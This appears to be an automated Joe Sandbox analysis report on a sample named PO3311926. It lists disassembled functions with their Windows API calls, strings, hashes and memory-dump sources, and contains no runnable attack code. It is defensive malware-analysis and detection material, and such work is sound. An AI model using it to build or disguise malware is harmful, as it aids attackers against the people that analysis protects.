Instruction ID: 19f2194dbb1a46c032f66d12adbf1a60db936db183d478850df9fec41e2d76d8
Opcode Fuzzy Hash: 1764bd771b448db6109813bc232122fe817a88f44f82063f027c20f24c2bb21b
Instruction Fuzzy Hash: 1C01B1312092106AEF31AB758C59BFD77C8EF0B781F044495F902E6092EB64CA81C6BB

Uniqueness

Uniqueness Score: -1.00%

Function 00BCB893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00BCB8B8

Strings

, xrefs: 00BCB8FD

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: e08edd8711752ce3970570afa97217fe3ab71d5e08c9519b9fd5bd17f1fb31aa
Instruction ID: 3c39e43cc98900bffa270684238dfa1580987473bad14f6a8c5a1d4360bf98c7
Opcode Fuzzy Hash: e08edd8711752ce3970570afa97217fe3ab71d5e08c9519b9fd5bd17f1fb31aa
Instruction Fuzzy Hash: 0741F57050428C9ADF228E688C85FFABBE9EB55304F1404EDE6DAC7142D775AA458B60

Uniqueness

Uniqueness Score: -1.00%

Function 00BCAF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,000000FF), ref: 00BCAFDD

Strings

LCMapStringEx, xrefs: 00BCAF7D, 00BCAF87

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 35de2692b3ea1af01b8d147108b4c95253d2506ac950f1b2a0b04b12bb9d1e8b
Instruction ID: 1167552d331b83933e1b1fc9958c85a37559971109266d38029ee4e6b6b8b1f8
Opcode Fuzzy Hash: 35de2692b3ea1af01b8d147108b4c95253d2506ac950f1b2a0b04b12bb9d1e8b
Instruction Fuzzy Hash: 7E014C3254510DBBCF125F90DC15DEEBFA2EF08754F01419AFE1466271DA768931EB81

Uniqueness

Uniqueness Score: -1.00%

Function 00BCAF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00BCA56F), ref: 00BCAF55

Strings

InitializeCriticalSectionEx, xrefs: 00BCAF1B, 00BCAF25

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 18b00524f4bfd4c9a74a1676763b5dc7b085567a60ad976b8cd374e55d0f23e5
Instruction ID: 6184f814fdf903aa84fe03276cb01d0d90d9fb0d9f00b962612333f27c99cd56
Opcode Fuzzy Hash: 18b00524f4bfd4c9a74a1676763b5dc7b085567a60ad976b8cd374e55d0f23e5
Instruction Fuzzy Hash: 85F0BB3254611CBBCB115F50CC15DADFFD1DF04B11B40409AFC1897260FE714E10978A

Uniqueness

Uniqueness Score: -1.00%

Function 00BCADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00BCADEE

Strings

FlsAlloc, xrefs: 00BCADC0, 00BCADCA

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 24eb71b8ca90aeee4a4b466f6f5eda5a376bf2135734f9ce19ae4cc2cea01740
Instruction ID: 9a727d115148b841bd0b2b46621588d1d4d4a76f630aabbe2fba41e985211f4d
Opcode Fuzzy Hash: 24eb71b8ca90aeee4a4b466f6f5eda5a376bf2135734f9ce19ae4cc2cea01740
Instruction Fuzzy Hash: 45E05532A8221D7BC200AB64CC22EAEFBD0CB04B21B4000EAF805A7350FD744E0086CA

Uniqueness

Uniqueness Score: -1.00%

Function 00BCBBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 00BCB7BB: GetOEMCP.KERNEL32(00000000,?,?,00BCBA44,?), ref: 00BCB7E6

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00BCBA89,?,00000000), ref: 00BCBC64
GetCPInfo.KERNEL32(00000000,00BCBA89,?,?,?,00BCBA89,?,00000000), ref: 00BCBC77

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: a754d28a7d1a3b672527e5788a6d230079584e2ae98f120e7011b38c6ecf3b26
Instruction ID: 1e69f512a95741d4dcd83b3009942713674024ddb533a2a706249ce1a0f7a0ab
Opcode Fuzzy Hash: a754d28a7d1a3b672527e5788a6d230079584e2ae98f120e7011b38c6ecf3b26
Instruction Fuzzy Hash: 235111709002459EDB209F75C892FBFBBE4EF41310F1840FED4969B252EB359945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00BA9A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00BA9A50,?,?,00000000,?,?,00BA8CBC,?), ref: 00BA9BAB
GetLastError.KERNEL32(?,00000000,00BA8411,-00009570,00000000,000007F3), ref: 00BA9BB6

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: e2370dc864f529d24c95c97af5c70c1b51be0d26b9c63332b34d657240071ced
Instruction ID: bc3fc24e9c93bde519afc87889e632e8bd52a05404c035309c51aa9ac759c1f9
Opcode Fuzzy Hash: e2370dc864f529d24c95c97af5c70c1b51be0d26b9c63332b34d657240071ced
Instruction Fuzzy Hash: 3241E13060C3018FDB24DF15E58456AF7E5FFD6720F548AAEE89283260D770ED44AB61

Uniqueness

Uniqueness Score: -1.00%

Function 00BA1E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BA1E55

Part of subcall function 00BA3BBA: __EH_prolog.LIBCMT ref: 00BA3BBF

_wcslen.LIBCMT ref: 00BA1EFD

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: H_prolog$_wcslen
String ID:
API String ID: 2838827086-0
Opcode ID: 110b841676132a16971501170a1e4d421efccd984c7ad5eef41cc9e0675b5788
Instruction ID: 58961cbef09d917539626f264cfbbf5ad95d2465170bd32395b1f1916008f966
Opcode Fuzzy Hash: 110b841676132a16971501170a1e4d421efccd984c7ad5eef41cc9e0675b5788
Instruction Fuzzy Hash: 53314B71908209AFCF55DF98C955AEEBBF6EF09300F1008A9F445A7251CB365E00CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00BA9DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00BA73BC,?,?,?,00000000), ref: 00BA9DBC
SetFileTime.KERNELBASE(?,?,?,?), ref: 00BA9E70

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: efd7e164f2620f9e8f926d69c230c449d402356c696a32edf7def955b9b84c89
Instruction ID: 06e11e4b73059c6aeab303b02efcfdd679532279693abcba588864c9d13354b7
Opcode Fuzzy Hash: efd7e164f2620f9e8f926d69c230c449d402356c696a32edf7def955b9b84c89
Instruction Fuzzy Hash: 9921D03124D246ABC714CF34C891AABBBE8EF56704F0849ADF4C587142D329E94CAB62

Uniqueness

Uniqueness Score: -1.00%

Function 00BA966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00BA9F27,?,?,00BA771A), ref: 00BA96E6
CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00BA9F27,?,?,00BA771A), ref: 00BA9716

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 04ca2e2ea3943e53ac4351a7a5dcfa195a3095ace14f5a4afa238d3f84d16715
Instruction ID: 81e05c4dc2b04b9c145353f52fc4d7ca2978c0eb78781a5891eba0a7407cf0d6
Opcode Fuzzy Hash: 04ca2e2ea3943e53ac4351a7a5dcfa195a3095ace14f5a4afa238d3f84d16715
Instruction Fuzzy Hash: FC21C1711087446FE3308A69CC89FF7B7DCEF4A320F100A59F996C61D2C7B4A884A631

Uniqueness

Uniqueness Score: -1.00%

Function 00BA9E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00BA9EC7
GetLastError.KERNEL32 ref: 00BA9ED4

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 1163f16645e6dc7d1d2f092ea38186604ada749e1b2757c877393092635a48f5
Instruction ID: dccefb8f07ce48f6a8c82fbf756fa06168b52e024eb41402e1b27ce4901a1e5a
Opcode Fuzzy Hash: 1163f16645e6dc7d1d2f092ea38186604ada749e1b2757c877393092635a48f5
Instruction Fuzzy Hash: 6D11E571608700EBE724C628C880BA6B7E8EB46360F604AA9E152D2AD1E770ED4DD760

Uniqueness

Uniqueness Score: -1.00%

Function 00BC8E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00BC8E75

Part of subcall function 00BC8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00BC4286,?,0000015D,?,?,?,?,00BC5762,000000FF,00000000,?,?), ref: 00BC8E38

HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00BE1098,00BA17CE,?,?,00000007,?,?,?,00BA13D6,?,00000000), ref: 00BC8EB1

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: 9e3dee50dd1496824dbc773e989a9cd15f48046387e44e5770dd5db95b9eff9c
Instruction ID: f734ea829de9fd1da52c91b4d2063911b6b061f64149564e4106542f3364f34f
Opcode Fuzzy Hash: 9e3dee50dd1496824dbc773e989a9cd15f48046387e44e5770dd5db95b9eff9c
Instruction Fuzzy Hash: 97F0963260511766DB212A29AC05FAF77D8CF82B70F2941EEF814A7191DF71DD0195B1

Uniqueness

Uniqueness Score: -1.00%

Function 00BB109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 00BB10AB
GetProcessAffinityMask.KERNEL32(00000000), ref: 00BB10B2

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 3d9730ea3cfd65e9b5310b0f832ec4fc4e5d14ed4af15064395b1a2cf8cae3bb
Instruction ID: 484299caa767931f44435a0a5fb22c0158261980e4a4fbbe1dcbb965273774b4
Opcode Fuzzy Hash: 3d9730ea3cfd65e9b5310b0f832ec4fc4e5d14ed4af15064395b1a2cf8cae3bb
Instruction Fuzzy Hash: E7E0D832B00145A7CF0997B89C259FFB3EDEB4420479485B7E403D3101F9B0DE414660

Uniqueness

Uniqueness Score: -1.00%

Function 00BAA4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00BAA325,?,?,?,00BAA175,?,00000001,00000000,?,?), ref: 00BAA501

Part of subcall function 00BABB03: _wcslen.LIBCMT ref: 00BABB27

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00BAA325,?,?,?,00BAA175,?,00000001,00000000,?,?), ref: 00BAA532

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 53a423124617f7a9dc7954586562cff3b10b535a9b5d11a15142aaa9b2788a6e
Instruction ID: 736334d59ca9d475a478910cb962d68fcf6e53b30dcc30755cf6d55abe912885
Opcode Fuzzy Hash: 53a423124617f7a9dc7954586562cff3b10b535a9b5d11a15142aaa9b2788a6e
Instruction Fuzzy Hash: 07F0A0312001097BDF016F60DC41FDA3BECEB14785F848092B845D6161EB71CA94DA20

Uniqueness

Uniqueness Score: -1.00%

Function 00BAA1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(000000FF,?,?,00BA977F,?,?,00BA95CF,?,?,?,?,?,00BD2641,000000FF), ref: 00BAA1F1

Part of subcall function 00BABB03: _wcslen.LIBCMT ref: 00BABB27

DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00BA977F,?,?,00BA95CF,?,?,?,?,?,00BD2641), ref: 00BAA21F

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: d19b607bb9fe5bf337813349dc739aa0ef746889d8ee8266c598b99554f4f6cf
Instruction ID: 836ea380e3d96217b635a28c02dfaf2a1ba8b6867ef448b434dfe9f1f9361bd8
Opcode Fuzzy Hash: d19b607bb9fe5bf337813349dc739aa0ef746889d8ee8266c598b99554f4f6cf
Instruction Fuzzy Hash: D4E092351442096BDB015F60DC85FED77DCEB09781F4840A1B945D2061EB61DE98DA61

Uniqueness

Uniqueness Score: -1.00%

Function 00BBAC7C Relevance: 3.0, APIs: 2, Instructions: 26comCOMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,00BD2641,000000FF), ref: 00BBACB0
OleUninitialize.OLE32(?,?,?,?,00BD2641,000000FF), ref: 00BBACB5

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 1e34fc6648dc011b2e97d9b833c70cd0c3cef6e121ada1007d059ff4bf4520d8
Instruction ID: be6e9a5269181d3e1662c2dbcb87481201c85aae9c184b75d8412cbfa7a528e8
Opcode Fuzzy Hash: 1e34fc6648dc011b2e97d9b833c70cd0c3cef6e121ada1007d059ff4bf4520d8
Instruction Fuzzy Hash: 3FE03972604A90EBCB109B58DC46B49FBE8FB88B20F00426AA416937A0CB74A901CA90

Uniqueness

Uniqueness Score: -1.00%

Function 00BAA243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,00BAA23A,?,00BA755C,?,?,?,?), ref: 00BAA254

Part of subcall function 00BABB03: _wcslen.LIBCMT ref: 00BABB27

GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00BAA23A,?,00BA755C,?,?,?,?), ref: 00BAA280

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: d54f104d69cf3f209cb9ead65fa811996561e6bbc7d5f13580f213fa7086f683
Instruction ID: 3590c6f83284d126a901060ded548dd78b8dbc29a0d9efda81aaff53dad68f85
Opcode Fuzzy Hash: d54f104d69cf3f209cb9ead65fa811996561e6bbc7d5f13580f213fa7086f683
Instruction Fuzzy Hash: 1CE092315001246BCB50AB64CC05BE9BBD8EB0D7E1F0442A1FD55E3191DB70DE44CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BBDEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00BBDEEC

Part of subcall function 00BA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BA40A5

SetDlgItemTextW.USER32(00000065,?), ref: 00BBDF03

Part of subcall function 00BBB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00BBB579
Part of subcall function 00BBB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00BBB58A
Part of subcall function 00BBB568: IsDialogMessageW.USER32(0001042E,?), ref: 00BBB59E
Part of subcall function 00BBB568: TranslateMessage.USER32(?), ref: 00BBB5AC
Part of subcall function 00BBB568: DispatchMessageW.USER32(?), ref: 00BBB5B6

Memory Dump Source

Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
